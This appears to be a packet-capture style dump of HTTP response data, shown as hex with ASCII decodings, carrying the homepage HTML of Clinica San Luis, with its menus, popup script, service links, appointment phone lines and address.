                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3181INData Raw: 63 6c 69 6e 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22
                                                                                                                                                                                                                                                                                                      Data Ascii: clinica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3182INData Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                                      Data Ascii: item-container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3184INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65
                                                                                                                                                                                                                                                                                                      Data Ascii: g-menu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-containe
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3185INData Raw: 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: /nuestra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-ite
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3186INData Raw: 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70
                                                                                                                                                                                                                                                                                                      Data Ascii: enu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-drop
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3188INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3189INData Raw: 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73
                                                                                                                                                                                                                                                                                                      Data Ascii: t"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><s
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3190INData Raw: 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: -item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3192INData Raw: 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: pan></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3193INData Raw: 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31
                                                                                                                                                                                                                                                                                                      Data Ascii: za del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.1
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3194INData Raw: 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: t: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeCli
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3196INData Raw: 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: ;refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3197INData Raw: 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: v class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div cl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3198INData Raw: 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61
                                                                                                                                                                                                                                                                                                      Data Ascii: hone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-a
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3200INData Raw: 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69
                                                                                                                                                                                                                                                                                                      Data Ascii: /apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></di
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3201INData Raw: 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69
                                                                                                                                                                                                                                                                                                      Data Ascii: unacin</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3202INData Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3204INData Raw: 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                      Data Ascii: mail&#160;protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</b
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3205INData Raw: 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61
                                                                                                                                                                                                                                                                                                      Data Ascii: tle">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-la
